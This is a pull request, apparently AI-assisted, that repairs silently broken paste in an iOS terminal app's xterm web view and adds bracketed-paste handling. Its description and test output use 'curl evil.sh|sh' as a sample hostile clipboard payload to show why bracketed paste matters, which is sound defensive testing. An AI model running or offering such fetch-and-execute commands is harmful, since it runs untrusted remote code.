### PR TITLE
fix(ios): repair silently-broken terminal paste (out-of-scope encoder)

### DIFF
--- a/ios/MajorTom/Features/Terminal/Resources/terminal.html
+++ b/ios/MajorTom/Features/Terminal/Resources/terminal.html
@@ -559,7 +559,10 @@
         // Send directly to the PTY, bypassing xterm input processing
         // to avoid bracket paste mode issues in raw paste.
         // Encode as binary so the relay treats it as PTY input.
-        ws.send(encoder.encode(text));
+        // Build a local encoder: initTerminal()'s `encoder` is function-scoped
+        // and invisible from here (window.MajorTom lives at the outer IIFE
+        // level), so referencing it threw ReferenceError and paste no-op'd.
+        ws.send(new TextEncoder().encode(text));
       }
     },
 

--- a/ios/MajorTom/Features/Terminal/Resources/terminal.html
+++ b/ios/MajorTom/Features/Terminal/Resources/terminal.html
@@ -556,13 +556,25 @@
      */
     paste: function(text) {
       if (term && ws && ws.readyState === WebSocket.OPEN) {
-        // Send directly to the PTY, bypassing xterm input processing
-        // to avoid bracket paste mode issues in raw paste.
-        // Encode as binary so the relay treats it as PTY input.
-        // Build a local encoder: initTerminal()'s `encoder` is function-scoped
-        // and invisible from here (window.MajorTom lives at the outer IIFE
-        // level), so referencing it threw ReferenceError and paste no-op'd.
-        ws.send(new TextEncoder().encode(text));
+        // Route through xterm's paste path, NOT a raw ws.send. term.paste()
+        // does not write to the screen buffer — it normalizes the text and
+        // fires the same onData event typing does, so there is no local echo.
+        // What it adds is the two things a raw send silently drops:
+        //   1. Bracketed paste (DEC private mode 2004). When the app has
+        //      enabled it, xterm wraps the payload in ESC[200~ … ESC[201~ so
+        //      the shell treats it as literal text. Without the wrapper a
+        //      multi-line clipboard payload auto-executes every line the
+        //      instant it lands; with it the lines sit inert on the prompt
+        //      awaiting Enter, and the `claude` TUI receives them as ONE
+        //      multi-line prompt instead of N submitted turns.
+        //   2. Newline normalization (/\r?\n/g → "\r"). zsh binds both ^J and
+        //      ^M to accept-line, so raw CRLF content double-submits.
+        // Encoding is downstream and unchanged: term.onData still does the
+        // TextEncoder + binary ws.send, so the wire contract is identical.
+        // (The previous code hand-rolled the send in order to "reuse the
+        // shared encoder" — which encoder instance is used was never the
+        // point, and chasing it is what left paste dead since 6db7835.)
+        term.paste(text);
       }
     },
 

--- a/ios/MajorTom/Features/Terminal/Views/TerminalWebView.swift
+++ b/ios/MajorTom/Features/Terminal/Views/TerminalWebView.swift
@@ -346,6 +346,15 @@ struct TerminalWebView: UIViewRepresentable {
             guard recognizer.state == .began else { return }
             guard let interaction = editMenuInteraction else { return }
             let location = recognizer.location(in: recognizer.view)
+            // Tactile confirmation that the long-press crossed the threshold and
+            // the Paste menu is appearing. `.medium` matches the app's menu/mode
+            // feedback; the lighter tap-confirmation haptic fires on Paste itself.
+            // Gated on the same `hasStrings` check the menu delegate uses — with
+            // an empty pasteboard it returns an empty menu (nothing renders), so
+            // an unconditional buzz would promise UI that never shows.
+            if UIPasteboard.general.hasStrings {
+                HapticService.impact(.medium)
+            }
             let configuration = UIEditMenuConfiguration(identifier: nil, sourcePoint: location)
             interaction.presentEditMenu(with: configuration)
         }

--- a/ios/MajorTom/Features/Terminal/Views/TerminalWebView.swift
+++ b/ios/MajorTom/Features/Terminal/Views/TerminalWebView.swift
@@ -429,9 +429,19 @@ extension TerminalWebView.Coordinator: @preconcurrency UIEditMenuInteractionDele
         suggestedActions: [UIMenuElement]
     ) -> UIMenu? {
         guard UIPasteboard.general.hasStrings else { return UIMenu(children: []) }
+        // `identifier: .paste` is load-bearing, not cosmetic. Reading
+        // `UIPasteboard.general.string` programmatically trips the iOS 16
+        // "Allow Paste?" modal; the system waives it only for UIPasteControl,
+        // the standard `paste(_:)` responder command, or — as here — a
+        // UIAction tagged with the standard paste identifier. UIPasteControl
+        // is a UIView and can't live inside a UIMenu, so this identifier is
+        // the only exemption available on this path. Without it, tapping
+        // "Don't Allow" makes the `guard let text` below fail silently, which
+        // is indistinguishable from the dead-paste bug this file just fixed.
         let paste = UIAction(
             title: "Paste",
-            image: UIImage(systemName: "doc.on.clipboard")
+            image: UIImage(systemName: "doc.on.clipboard"),
+            identifier: .paste
         ) { [weak self] _ in
             guard let self,
                   let text = UIPasteboard.general.string,


### PR DESCRIPTION
Terminal paste has been a **silent no-op since 2026-04-10**. Both entry points were dead: the keybar Paste button / long-press (`TerminalView.swift:220`) and the edit-menu path added later by PR #175.

## Root cause: `6db7835` — not PR #175

`git log -L` on the paste function:

| commit | date | `paste()` body | state |
|---|---|---|---|
| `4f0a437` | 2026-04-09 | `ws.send(text)` | works |
| `e9b2621` | 2026-04-10 | `ws.send(new TextEncoder().encode(text))` | works |
| **`6db7835`** | **2026-04-10** | **`ws.send(encoder.encode(text))`** | **dead** |

`6db7835` is *"fix(ios,macos): address PR #111 review comments"*, and its changelog line reads verbatim: **"terminal.html: reuse existing TextEncoder in paste()"**. The suggestion sounded reasonable and was wrong. `var encoder = new TextEncoder()` is declared at `terminal.html:192`, **inside `initTerminal()`**; `window.MajorTom` is an object literal at the **outer IIFE level**. `var` is function-scoped, so the identifier is simply unresolvable from there — every paste threw `ReferenceError` before reaching `ws.send`.

**PR #175 merged 2026-05-24**, six weeks after the break, and only added a *second* entry point to an already-dead function. It is not the culprit. The keybar path (`9dfcb1c`) is an ancestor of `6db7835`, so it worked first and then went dead alongside it.

**Why nobody noticed:** `TerminalViewModel.pasteText` fires the bridge call as `webView.evaluateJavaScript(js) { _, _ in }` — the error argument is discarded, so the throw never reached Swift, the UI, or any log. The injected JS even guards with `if (window.MajorTom && window.MajorTom.paste)`; that guard *passes* (the function object exists), then throws inside it. Menu appeared, "Paste" was tappable, nothing happened.

## Fix 1 — route through `term.paste()`, not a raw `ws.send`

The first revision of this PR restored delivery by rebuilding a local `TextEncoder` and sending bytes straight down the socket. That delivers the text "as if typed" — which is the bug. A raw `ws.send` bypasses xterm's paste path and silently drops two things:

1. **Bracketed paste (DEC private mode 2004).** `zsh -i` in a PTY does emit `ESC[?2004h`. Without the wrapper, a clipboard payload containing `git status\ncurl evil.sh|sh\n` **auto-executes both lines on arrival**. Every desktop terminal lands that inert on the command line awaiting an explicit Enter. This is a security control that was off.
2. **Newline normalization.** zsh maps both `^J` and `^M` to `accept-line`, so raw CRLF content double-submits.

And it broke the app's whole point: multi-line paste into the `claude` TUI arrived as N separate prompt turns instead of one multi-line message, because without the wrapper the TUI can't distinguish paste from typing.

**The earlier claim that `term.paste()` "would echo text locally that the PTY never received" was factually wrong.** xterm's paste path does not touch the screen buffer. Module 7861 of the shipped bundle is, verbatim:

```js
function i(e){return e.replace(/\r?\n/g,"\r")}
function s(e,t){return t?"\x1b[200~"+e+"\x1b[201~":e}
function r(e,t,r,n){
  e=s(e=i(e), r.decPrivateModes.bracketedPasteMode && !0!==n.rawOptions.ignoreBracketedPasteMode),
  r.triggerDataEvent(e,!0), t.value=""
}
```

Normalize → conditionally bracket → `triggerDataEvent`. No `write()`, so no local echo. `Terminal.paste(e){this._core.paste(e)}` is public API, `term` is already in scope, and `triggerDataEvent` lands in the **same** `onData` handler and the **same** binary frame — the wire contract is unchanged.

The rewritten comment now states that rationale explicitly, including *why a shared encoder is not the point*: encoding is downstream of the decision that actually matters, and chasing encoder reuse is exactly what killed this function for four months.

### Verification (Node `vm` harness, real xterm module 7861 extracted from the shipped bundle)

```
══ (a) UTF-8 fidelity: ASCII / emoji / CJK (bracketed paste OFF) ══
  ASCII  binary[7]  "ls -la\r"                6c73202d6c610d
  emoji  binary[19] "echo \"héllo 🚀\"\r"     6563686f202268c3a96c6c6f20f09f9a80220d
  CJK    binary[24] "echo 日本語テスト\r"      6563686f20e697a5e69cace8aa9ee38386e382b9e383880d

══ (b) CRLF / LF normalization ══
  CRLF   binary[8]  "one\rtwo\r"              6f6e650d74776f0d
  LF     binary[14] "echo a\recho b\r"        6563686f20610d6563686f20620d

══ (c) Bracketed paste gated on DEC private mode 2004 ══
  2004 ON   binary[39] "^[[200~git status\rcurl evil.sh|sh\r^[[201~"
  2004 OFF  binary[27] "git status\rcurl evil.sh|sh\r"

══ (d) paste while socket is not OPEN ══
  CLOSED      threw: (nothing)   frames: (none)
  CONNECTING  threw: (nothing)   frames: (none)

  ALL PASS (9/9)
```

Paste-while-disconnected stays a silent no-op: the `ws.readyState === WebSocket.OPEN` guard is retained, and `term.onData` guards again downstream.

## Fix 2 — `identifier: .paste` on the Paste `UIAction`

The action was built as `UIAction(title:image:)` with an auto-generated identifier, so `UIPasteboard.general.string` was a bare programmatic read that trips the iOS 16 **"Allow Paste?"** modal. The system waives that prompt only for `UIPasteControl`, the standard `paste(_:)` responder command, or a `UIAction` carrying `UIAction.Identifier.paste` (`UIActionPaste`, iOS 15+, confirmed in `UIKit.framework/Headers/UIAction.h`). `UIPasteControl` is a `UIView` and cannot live inside a `UIMenu`, so the identifier is the only exemption available on this path.

Without it, QA fails in a way that looks *exactly* like the bug being fixed: tap Paste → unexpected system modal → tap "Don't Allow" → `guard let text` fails → nothing happens, no error, no feedback. Setting a standard identifier does not change the menu's appearance or ordering — it's a semantic tag, and this menu is a single custom `UIMenu` returned from `UIEditMenuInteractionDelegate` anyway.

## Also in this PR — honest long-press haptic

Long-press produced no tactile feedback, so a press that didn't register was indistinguishable from one that did. Added `HapticService.impact(.medium)`, **gated on `UIPasteboard.general.hasStrings`** — the same guard the edit-menu delegate applies. With an empty pasteboard the delegate returns `UIMenu(children: [])` and nothing renders, so an unconditional buzz would promise UI that never appears. (`hasStrings` is a metadata check and does **not** trigger the paste prompt.)

## Audit notes

- **Sibling scope bugs — none.** Audited every `window.MajorTom` member and every IIFE-level function. Only four identifiers are declared inside `initTerminal()`: `theme`, `initialFontSize`, `container`, `encoder`. The first three are never referenced from outer scope. `encoder` was the sole leak, and it now remains only on the in-scope `term.onData` hot path.
- **Wire contract unchanged.** `docs/TERMINAL-PROTOCOL-SPEC.md` and `relay/src/routes/shell.ts:219-226` agree that binary = raw PTY bytes. `term.onData` still does `encoder.encode(...)` + binary `ws.send`, so `term.paste()` produces byte-identical framing — it only changes *what bytes* are correct.
- **`textarea` is non-null when paste runs.** `term.open(container)` is called at `terminal.html:159`, before `connectWS()` at 215/224, so the socket cannot be OPEN before the textarea exists.
- **No regression to non-paste input.** `sendKey` and the pan/swipe→arrows handler are untouched.

## Known limitation

Paste >64 KiB exceeds `MAJOR_TOM_PTY_INPUT_MAX`; the relay closes with `1009`, the client reconnects and replays the ring buffer, but that paste is lost with no user-visible explanation. Out of scope here — tracked as **#189**.

## Build

**Independently re-verified** from the primary checkout at `9411478`:

```
xcodebuild -project ios/MajorTom.xcodeproj -scheme MajorTom \
  -destination 'generic/platform=iOS Simulator' build
** BUILD SUCCEEDED **
```

Working tree confirmed to contain the fix before building (`terminal.html` sha256 `73404441…`, `term.paste(text)` present).

> **Correction.** An earlier revision of this section claimed a green `build_sim`. That build actually compiled a *different worktree's copy of `main`* — its DerivedData `WorkspacePath` pointed elsewhere and the built `terminal.html` still contained `ws.send(encoder.encode(text))`. The claim was wrong; the result above replaces it.
>
> Worth flagging beyond this PR: `.github/workflows/ci.yml:169` has the `xcodebuild` step commented out, so **there is no iOS job in CI**. Every iOS build claim in this repo is unverified unless someone re-runs it against the right project path.

## Device QA checklist for Sean

- [ ] Long-press the terminal → Paste menu appears **and** you feel a medium haptic
- [ ] Tap Paste → **no "Allow Paste?" system modal appears**, and the text actually lands in the shell (this is the whole bug — it did nothing before)
- [ ] Multi-line paste (copy a 3-4 line block) at a shell prompt → all lines arrive and sit **inert on the command line awaiting Enter**. They must NOT auto-execute. Press Enter once to run.
- [ ] Multi-line paste into the `claude` TUI → arrives as **ONE prompt turn** containing all the lines, not N separate submitted turns
- [ ] Paste text copied from a Windows/CRLF source → no doubled/blank submissions
- [ ] Keybar Paste button (not the long-press menu) → also delivers; it's the second call site that was dead since April
- [ ] Long-press with an **empty clipboard** → no haptic, no menu
- [ ] Paste while **disconnected** (kill the relay, then paste) → nothing happens, terminal doesn't wedge, reconnect still works
- [ ] **PR #175 regression check (never QA'd):** swipe up/down/left/right on the terminal still emits arrow keys

🤖 Generated with [Claude Code](https://claude.com/claude-code)

